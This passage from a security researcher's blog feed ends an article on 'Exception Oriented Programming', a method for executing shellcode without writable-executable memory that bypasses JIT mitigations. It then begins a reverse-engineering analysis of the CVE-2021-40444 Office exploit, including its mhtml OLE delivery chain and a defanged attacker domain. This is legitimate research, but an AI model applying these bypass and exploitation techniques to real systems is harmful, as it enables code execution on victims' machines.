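    if (sig == SIGTRAP)
        ++g_trap_count;
}

// Step 1: register a SIGTRAP handler with sigaction and the SA_SIGINFO flag.
bool InstallTrapHandler() {
    struct sigaction sa = {};
    sa.sa_sigaction = TrapHandler;
    sa.sa_flags = SA_SIGINFO;
    sigemptyset(&sa.sa_mask);
    return sigaction(SIGTRAP, &sa, nullptr) == 0;
}
```

In the real attack the trap comes from executing the harvested `int3` byte rather than from `raise`, but the delivery path into the handler is the same.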
<!--kg-card-end: markdown--><p>Assuming the shellcode ends with a return instruction, eventually the execution flow will be gracefully returned to the caller.</p><p>Exception Oriented Programming highlights a fundamental design flaw with the JIT restrictions present in the Hardened Runtime. The JIT mitigation assumes that to execute code &quot;just-in-time&quot;, an attacker must have access to a WX page. In reality, an attacker can abuse a large amount of the instructions already present in legitimate modules to execute their own malicious shellcode.</p><h1 id="proof-of-concept">Proof of Concept</h1><p>Both the Windows and macOS proof-of-concept utilities can be accessed at <a href="https://github.com/D4stiny/ExceptionOrientedProgramming">this repository</a>.</p><h1 id="conclusion">Conclusion</h1><p>As seen with the new methodology in this article, code execution can be achieved without the need of dedicated memory for that code. When considering future research into runtime code execution, it is more effective to look at execution from a high-level perspective, an objective of executing the operations in a piece of code, instead of focusing on the requirements of existing methodology.</p><p>In part 2 of this series, we will explore how Exception Oriented Programming expands the possibilities for buffer overflow exploitation on Windows. We&apos;ll explore how to evade Microsoft&apos;s ROP mitigations such as security cookies and SafeSEH for gaining code execution from common vulnerabilities. Make sure to follow <a href="https://twitter.com/BillDemirkapi">my Twitter</a> to be amongst the first to know when this article has been published!</p><h1 id="parallel-discovery">Parallel Discovery</h1><p>Recently, another researcher (<a href="https://twitter.com/x86matthew">@x86matthew</a>) published an article describing a similar idea to Exception Oriented Programming, implemented using vectored exception handlers for x86. 
</p><p>Whenever my research leads me to some new methodology I consider innovative, one practice I take is to publish a SHA256 hash of the idea, such that in the future, I can prove that I discovered a certain idea at a certain point in time. Fortunately, I followed this practice for Exception Oriented Programming.</p><p>On February 3rd, 2021, I created a <a href="https://gist.github.com/D4stiny/f339cbac4a9f8f2eeec63778bf546f28">public gist</a> of the following SHA256 hash:</p><pre><code class="language-text">5169c2b0b13a9b713b3d388e61eb007672e2377afd53720a61231491a4b627f7</code></pre><p>To prove that this hash is a representation of a message summarizing Exception Oriented Programming, here is the message you can take a SHA256 hash of and compare to the published one above.</p><blockquote>Instead of allocating executable memory to execute shellcode, split the shellcode into individual instructions, find modules in memory that have the instruction bytes in an executable section, then single step over those instructions (changing the RIP to the next instruction and so on).</blockquote><p>Since the core idea was published by Matthew, I wanted to share my additional research in this article around stealthier SEH exception handlers and how the impact is not limited to Windows. In a future article, I plan on sharing my additional research on how this methodology can be applied to previously unexploitable buffer overflow vulnerabilities on Windows.</p>]]></content:encoded></item><item><title><![CDATA[Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit]]></title><description><![CDATA[<p>In the middle of August 2021, a special <a href="https://www.virustotal.com/gui/file/3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf/">Word document</a> was uploaded to VirusTotal by a user from Argentina.
Although it was only detected by a single antivirus engine at the time, this sample turned out to be exploiting a zero day vulnerability in Microsoft Office to gain remote code</p>]]></description><link>https://billdemirkapi.me/unpacking-cve-2021-40444-microsoft-office-rce/</link><guid isPermaLink="false">61451855a39fe110b6ef56b4</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Fri, 07 Jan 2022 09:18:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2022/01/unpackingcve202140444-banner.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2022/01/unpackingcve202140444-banner.png" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit"><p>In the middle of August 2021, a special <a href="https://www.virustotal.com/gui/file/3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf/">Word document</a> was uploaded to VirusTotal by a user from Argentina. Although it was only detected by a single antivirus engine at the time, this sample turned out to be exploiting a zero day vulnerability in Microsoft Office to gain remote code execution.</p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://billdemirkapi.me/content/images/2021/11/image-1.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1408" height="462" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-1.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-1.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-1.png 1408w" sizes="(min-width: 1200px) 1200px"></figure><p>Three weeks later, Microsoft published an <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444">advisory</a> after being notified of the exploit by researchers from Mandiant and EXPMON. 
It took Microsoft nearly a month from the time the exploit was first uploaded to VirusTotal to publish a patch for the zero day.</p><p>In this blog post, I will be sharing my in-depth analysis of the several vulnerabilities abused by the attackers, how the exploit was patched, and how to port the exploit to a generic Internet Explorer environment.</p><h2 id="first-look">First Look</h2><p>A day after Microsoft published their advisory, I saw a tweet from the malware collection group <a href="https://twitter.com/vxunderground">@vxunderground</a> offering a malicious payload for CVE-2021-40444 to blue/red teams.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2021/11/image-2.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="742" height="252" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-2.png 600w, https://billdemirkapi.me/content/images/2021/11/image-2.png 742w" sizes="(min-width: 720px) 720px"></figure><p>I reached out to receive a copy, because why not? My curiosity has generally led me in the right direction in life, and I was interested in seeing a Microsoft Word exploit that had been found in the wild.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2021/11/image-3.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1224" height="238" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-3.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-3.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-3.png 1224w" sizes="(min-width: 720px) 720px"></figure><p>With the payload in hand, one of the first steps I took was placing it into an isolated virtual machine with basic dynamic analysis tooling.
Specifically, one of my favorite network monitoring utilities is <a href="https://www.telerik.com/fiddler/fiddler-classic">Fiddler</a>, a freemium tool that allows you to intercept web requests (including encrypted HTTPS traffic).</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2021/11/image-4.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1072" height="420" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-4.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-4.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-4.png 1072w" sizes="(min-width: 720px) 720px"></figure><p>After I opened the malicious Word document, Fiddler immediately captured strange HTTP requests to the domain, &quot;hidusi[.]com&quot;. For some reason, the Word document was making a request to &quot;http://hidusi[.]com/e8c76295a5f9acb7/side.html&quot;.</p><p>At this point, the &quot;hidusi[.]com&quot; domain was already taken down. Fortunately, the &quot;side.html&quot; file being requested was included with the sample that was shared with me.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2021/11/image-5.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1120" height="396" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-5.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-5.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-5.png 1120w" sizes="(min-width: 720px) 720px"></figure><p>Unfortunately, the HTML file was largely filled with obfuscated JavaScript. 
Although I could immediately deobfuscate this JavaScript and go from there, doing so at an early stage is generally a bad idea because we have no understanding of the exploit yet.</p><h2 id="reproduction">Reproduction</h2><p>Whenever I encounter a new vulnerability that I want to reverse engineer, my first goal is always to produce a minimal reproduction example of the exploit to ensure I have a working test environment and a basic understanding of how the exploit works. Having a reproduction case is critical to reverse engineering how the bug works, because it allows for dynamic analysis.</p><p>Since the original &quot;hidusi[.]com&quot; domain was down, we needed to host our version of side.html. Hosting a file is easy, but how do we make the Word document use our domain instead? It was time to find where the URL to side.html was hidden inside the Word document.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-6.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="936" height="250" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-6.png 600w, https://billdemirkapi.me/content/images/2021/11/image-6.png 936w" sizes="(min-width: 720px) 720px"><figcaption>Raw Bytes of &quot;A Letter before court 4.docx&quot;</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-7.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="626" height="123" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-7.png 600w, https://billdemirkapi.me/content/images/2021/11/image-7.png 626w"><figcaption>Extracted Contents of &quot;A Letter before court 4.docx&quot;</figcaption></figure><p>Did you know that Office documents are just ZIP files?
As we can see from the bytes of the malicious document, the first few bytes are simply the magic value in the ZIP header.</p><p>Once I extracted the document as a ZIP, finding the URL was relatively easy. I performed a string search across every file the document contained for the domain &quot;hidusi[.]com&quot;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-8.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="722" height="279" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-8.png 600w, https://billdemirkapi.me/content/images/2021/11/image-8.png 722w" sizes="(min-width: 720px) 720px"><figcaption>Hidusi[.]com found under word/_rels/document.xml.rels</figcaption></figure><p>Sure enough, I found one match inside the file &quot;word/_rels/document.xml.rels&quot;. This file is responsible for defining relationships associated with embedded objects in the document.</p><p>OLE objects are part of Microsoft&apos;s proprietary <a href="https://en.wikipedia.org/wiki/Object_Linking_and_Embedding">Object Linking and Embedding</a> technology, which allows external documents, such as an Excel spreadsheet, to be embedded within a Word document.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-9.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1206" height="27" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-9.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-9.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-9.png 1206w" sizes="(min-width: 1200px) 1200px"><figcaption>Strange Target for OLE Object</figcaption></figure><p>The relationship that contained the malicious URL was an 
external OLE object with a strange &quot;Target&quot; attribute containing the &quot;mhtml&quot; protocol. Let&apos;s unpack what&apos;s going on in this value.</p><ol><li>In red, we see the URL Protocol &quot;mhtml&quot;.</li><li>In green, we see the malicious URL our proxy caught.</li><li>In blue, we see an interesting &quot;!x-usc&quot; suffix appended to the malicious URL.</li><li>In purple, we see the same malicious URL repeated.</li></ol><p>Let&apos;s investigate each piece one-by-one.</p><h3 id="reproduction-whats-mhtml">Reproduction: What&apos;s &quot;MHTML&quot;?</h3><p>A useful tool I&apos;ve discovered in past research is <a href="https://www.nirsoft.net/utils/url_protocol_view.html">URLProtocolView</a> from Nirsoft. At a high level, URLProtocolView allows you to list and enumerate the URL protocols installed on your machine.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-10.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="768" height="68" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-10.png 600w, https://billdemirkapi.me/content/images/2021/11/image-10.png 768w" sizes="(min-width: 720px) 720px"><figcaption>The MHTML Protocol in URLProtocolView</figcaption></figure><p>The MHTML protocol used in the Target attribute was a Pluggable Protocol Handler, similar to HTTP. 
The inetcomm.dll module was responsible for handling requests to this protocol.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-11.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="861" height="108" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-11.png 600w, https://billdemirkapi.me/content/images/2021/11/image-11.png 861w" sizes="(min-width: 720px) 720px"><figcaption>The HTTP* Protocols in URLProtocolView</figcaption></figure><p>Unlike MHTML, however, the HTTP protocol is handled by the urlmon.dll module.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2021/11/image-12.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="926" height="734" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-12.png 600w, https://billdemirkapi.me/content/images/2021/11/image-12.png 926w" sizes="(min-width: 720px) 720px"></figure><p>When I was researching past exploits involving the MHTML protocol, I came across an interesting article all the way back from 2011 about <a href="https://www.exploit-db.com/exploits/16071">CVE-2011-0096</a>. In this case, a Google engineer publicly disclosed an exploit that they suspected malicious actors attributed to China had already discovered. Similar to this vulnerability, CVE-2011-0096 was only found to be used in &quot;very targeted&quot; attacks.</p><p>While researching implementations of exploits for CVE-2011-0096, I came across an <a href="https://www.exploit-db.com/exploits/16071">exploit-db release</a> that included an approach for abusing the vulnerability through a Word document.
Specifically, in parts #5 and #6 of the exploit, the author discovered that CVE-2011-0096 could be abused to launch executables on the local machine and read the contents of the local filesystem. The interesting part here is that this 2011 vulnerability involved abusing the MHTML URL protocol and that it allowed for remote code execution via a Word document, similar to the case with CVE-2021-40444.</p><h3 id="reproduction-what-about-the-x-usc-in-the-target">Reproduction: What about the &quot;X-USC&quot; in the Target?</h3><p>Going back to our strange Target attribute, what is the &quot;!x-usc:&quot; portion for?</p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://billdemirkapi.me/content/images/2021/11/image-14.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1324" height="506" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-14.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-14.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-14.png 1324w" sizes="(min-width: 1200px) 1200px"></figure><p>I found <a href="mhtml:http://google.com/whatever!x-usc:http://bing.com">a blog post from 2018</a> by <a href="https://twitter.com/insertScript">@insertScript</a> which discovered that the x-usc directive was used to reference an external link. In fact, the example URL given by the author still works on the latest version of Internet Explorer (IE). If you enter &quot;mhtml:http://google.com/whatever!x-usc:http://bing.com&quot; into your IE URL bar while monitoring network requests, there will be requests to both Google and Bing, due to the &quot;x-usc&quot; directive.</p><p>In the context of CVE-2021-40444, I was unable to discover a definitive answer for why the same URL was repeated after an &quot;x-usc&quot; directive.
As we&apos;ll see in upcoming sections, the JavaScript in side.html is executed regardless of whether or not the attribute contains the &quot;x-usc&quot; suffix. It is possible that due to some potential race conditions, this suffix was added to execute the exploit twice to ensure successful payload delivery.</p><h3 id="reproduction-attempting-to-create-my-own-payload">Reproduction: Attempting to Create my Own Payload</h3><p>Now that we know how the remote side.html page is triggered by the Word document, it was time to try and create our own. Although we could proceed by hosting the same side.html payload the attackers used in their exploit, it is important to produce a minimal reproduction example first.</p><p>Instead of hosting the second-stage side.html payload, I opted to write a barebone HTML page that would indicate JavaScript execution was successful. This way, we can understand how JavaScript is executed by the Word document before reverse engineering what the attacker&apos;s JavaScript does.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-15.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="874" height="368" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-15.png 600w, https://billdemirkapi.me/content/images/2021/11/image-15.png 874w" sizes="(min-width: 720px) 720px"><figcaption>Test Payload to Prove JS Execution</figcaption></figure><p>In the example above, I created an HTML page that simply made an <a href="https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest">XMLHttpRequest</a> to a non-existent domain. 
If the JavaScript is executed, we should be able to see a request to &quot;icanseethisrequestonthenetwork.com&quot; inside of Fiddler.</p><p>Before testing in the actual Word document, I verified as a sanity check that this page does make the web request inside of Internet Explorer. Although the code may seem simple enough to where it would &quot;obviously work&quot;, performing simple sanity checks like these on fundamental assumptions you make can greatly save you time debugging future issues. For example, if you don&apos;t verify a fundamental assumption and continue with reverse engineering, you could spend hours debugging the wrong issue when in fact you were missing a basic mistake.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-16.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1668" height="97" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-16.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-16.png 1000w, https://billdemirkapi.me/content/images/size/w1600/2021/11/image-16.png 1600w, https://billdemirkapi.me/content/images/2021/11/image-16.png 1668w" sizes="(min-width: 1200px) 1200px"><figcaption>Modified Relationship with Barebone Payload</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-17.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="774" height="349" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-17.png 600w, https://billdemirkapi.me/content/images/2021/11/image-17.png 774w" sizes="(min-width: 720px) 720px"><figcaption>Network Requests After Executing Modified Document</figcaption></figure><p>Once I patched the original Word document with my 
modified relationship XML, I launched it inside my VM with the Fiddler proxy running. I was seeing requests to the send_request.html payload! But... there were no requests to &quot;icanseethisrequestonthenetwork.com&quot;. This disproved our fundamental assumption that whatever HTML page we point the MHTML protocol at will be executed.</p><p>How do you debug an issue like this? One approach would be to go in blind and try to reverse engineer the internals of the HTML engine to see why JavaScript wasn&apos;t being executed. This is not a great idea because these codebases can be <em>massive</em>, and it would be like finding a needle in a haystack.</p><p>What can we do instead? Create a minimal viable reproduction case where the JavaScript of the HTML <em>is</em> executed. We know that the attacker&apos;s payload must have worked in their attack. What if, instead of writing our own payload first, we tried to host their payload instead?</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-24.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="778" height="374" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-24.png 600w, https://billdemirkapi.me/content/images/2021/11/image-24.png 778w" sizes="(min-width: 720px) 720px"><figcaption>Network Requests After Executing with Side.html Payload</figcaption></figure><p>I uploaded the attacker&#x2019;s original &quot;side.html&quot; payload to my server and replaced the relationship in the Word document with that URL. When I executed this modified document in my VM, I saw something extremely promising: requests for &quot;ministry.cab&quot;. This means that the attacker&apos;s JavaScript inside side.html was executed!</p><p>We have an MVP payload that gets executed by the Word document, now what?
Although we could ignore our earlier problem with our own payload and try to figure out what the CAB file is used for directly, we&apos;d be skipping a crucial step of the exploit. We want to <em>understand</em> CVE-2021-40444, not just reproduce it.</p><p>With this MVP, we can now try to debug and reverse engineer the question, &quot;Why does the working payload result in JavaScript execution, but not our own sample?&quot;</p><h3 id="reproduction-reverse-engineering-microsoft%E2%80%99s-html-engine">Reproduction: Reverse Engineering Microsoft&#x2019;s HTML Engine</h3><p>The primary module responsible for processing HTML in Windows is MSHTML.DLL, the &quot;Microsoft HTML Viewer&quot;. This binary alone is 22 MB because it contains almost everything from rendering HTML to executing JavaScript. For example, Microsoft has its own JavaScript engine in this binary, used in Internet Explorer (and Word).</p><p>Given this massive size, blindly reversing is a terrible approach. What I like to do instead is use <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procmon">ProcMon</a> to trace the execution of the successful payload (the document with side.html) and the failing payload (the document with our barebone HTML), then compare their results.
I executed the attacker payload document and my own sample document while monitoring Microsoft Word with ProcMon.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-28.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="938" height="188" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-28.png 600w, https://billdemirkapi.me/content/images/2021/11/image-28.png 938w" sizes="(min-width: 720px) 720px"><figcaption>Microsoft Word Loading JScript9.dll in Success Case</figcaption></figure><p>With the number of operations an application like Microsoft Office makes, it can be difficult to sift through the noise. The best approach I have for this problem is to use context to find relevant operations. In this case, since we were looking into the execution of JavaScript, I looked for operations involving the word &#x201C;script&#x201D;.</p><p>What can we do with these relevant operations? An insanely useful feature of ProcMon is the ability to see the caller stack for a given operation.
This lets you see <em>what </em>executed the operation.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-31.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="582" height="435"><figcaption>Stack Trace of JScript9.dll Module Load</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-32.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1146" height="338" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-32.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-32.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-32.png 1146w" sizes="(min-width: 720px) 720px"><figcaption>IDA Pro Breakpoint on PostManExecute</figcaption></figure><p>It looked like the PostManExecute function was primarily responsible for triggering the complete execution of our payload. Using IDA Pro, I set a breakpoint on this function and opened both the successful and failing payloads.</p><p>I found that when the successful payload was launched, PostManExecute would be called, and the page would be loaded. In the failure case, however, PostManExecute was not called, and thus the page was never executed.
Now we needed to figure out why PostManExecute was being invoked for the attacker&#x2019;s payload but not ours.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-34.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="686" height="199" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-34.png 600w, https://billdemirkapi.me/content/images/2021/11/image-34.png 686w"><figcaption>Partial Stack Trace of JScript9.dll Module Load</figcaption></figure><p>Going back to the call stack, what&#x2019;s interesting is that PostManExecute seems to be the result of a callback that is being invoked in an asynchronous thread.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-35.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1253" height="158" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-35.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-35.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-35.png 1253w" sizes="(min-width: 720px) 720px"><figcaption>X-Refs to CDwnChan::OnMethodCall from Call Stack</figcaption></figure><p>Looking at the cross references for the function called right after the asynchronous dispatcher, CDwnChan::OnMethodCall, I found that it seemed to be queued in another function called CDwnChan::Signal.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-36.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1118" height="59" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-36.png 600w,
https://billdemirkapi.me/content/images/size/w1000/2021/11/image-36.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-36.png 1118w" sizes="(min-width: 720px) 720px"><figcaption>Asynchronous Execution of CDwnChan::OnMethodCall inside CDwnChan::Signal</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-37.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1010" height="325" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-37.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-37.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-37.png 1010w" sizes="(min-width: 720px) 720px"><figcaption>X-Refs to CDwnChan::Signal</figcaption></figure><p>CDwnChan::Signal seemed to be using the function &quot;_GWPostMethodCallEx&quot; to queue the CDwnChan::OnMethodCall to be executed in the asynchronous thread we saw. Unfortunately, this Signal function is called from many places, and it would be a waste of time to try to statically reverse engineer every reference.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-38.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="964" height="368" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-38.png 600w, https://billdemirkapi.me/content/images/2021/11/image-38.png 964w" sizes="(min-width: 720px) 720px"><figcaption>X-Refs to Asynchronous Queue&apos;ing Function __GWPostMethodCallEx</figcaption></figure><p>What can we do instead? Looking at the X-Refs for _GWPostMethodCallEx, it seemed like it was used to queue almost everything related to HTML processing. 
What if we hooked this function and compared the different methods that were queued between the success and failure paths?</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2021/11/image-47.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="938" height="531" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-47.png 600w, https://billdemirkapi.me/content/images/2021/11/image-47.png 938w" sizes="(min-width: 720px) 720px"></figure><p>Whenever __GWPostMethodCallEx was called, I recorded the method being queued for asynchronous execution and the call stack. The diagram above shows the methods that were queued during the execution of the successful payload and the failing payload. Strangely, in the failure path, the processing of the HTML page was terminated (CDwnBindData::TerminateOnApt) before the page was ever executed.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-49.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="774" height="286" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-49.png 600w, https://billdemirkapi.me/content/images/2021/11/image-49.png 774w" sizes="(min-width: 720px) 720px"><figcaption>Callstack for CDwnBindData::TerminateOnApt</figcaption></figure><p>Why was the Terminate function being queued before the OnMethodCall function in the failure path? The call stacks for the Terminate function matched between the success and failure paths.
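</p><p>For readers who want to reproduce this kind of trace without writing a custom hook, the same idea can be sketched with a Frida script. This is hypothetical: it assumes symbols for mshtml.dll resolve the non-exported name (the exact decorated name may differ), and the argument layout is an assumption for illustration.</p>

```javascript
// Frida sketch: log every method queued through _GWPostMethodCallEx along
// with its call stack, so the success and failure runs can be compared.
const target = DebugSymbol.getFunctionByName('_GWPostMethodCallEx');
Interceptor.attach(target, {
  onEnter(args) {
    console.log('queued:', DebugSymbol.fromAddress(args[1]).toString());
    console.log(Thread.backtrace(this.context, Backtracer.ACCURATE)
      .map(DebugSymbol.fromAddress).join('\n'));
  }
});
```

<p>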
Let&#x2019;s reverse engineer those functions.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-50.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="980" height="235" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-50.png 600w, https://billdemirkapi.me/content/images/2021/11/image-50.png 980w" sizes="(min-width: 720px) 720px"><figcaption>Partial Pseudocode of CDwnBindData::Read</figcaption></figure><p>When I debugged the CDwnBindData::Read function, which called the Terminate function, I found that a call to CDwnStm::Read was working in the success path but returning an error in the failure path. This is what terminated the page execution for our sample payload!</p><p>The third argument to CDwnStm::Read was supposed to be the number of bytes the client should try to read from the server. For some reason, the client was expecting 4096 bytes and my barebone HTML file was not that big.</p><p>As a sanity check, I added a bunch of useless padding to the end of my HTML file to make its size 4096+ bytes. 
Let&#x2019;s see our network requests with this modified payload.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-51.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1618" height="230" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-51.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-51.png 1000w, https://billdemirkapi.me/content/images/size/w1600/2021/11/image-51.png 1600w, https://billdemirkapi.me/content/images/2021/11/image-51.png 1618w" sizes="(min-width: 720px) 720px"><figcaption>Modified Barebone HTML with Padding to 4096 bytes</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-52.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="962" height="83" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-52.png 600w, 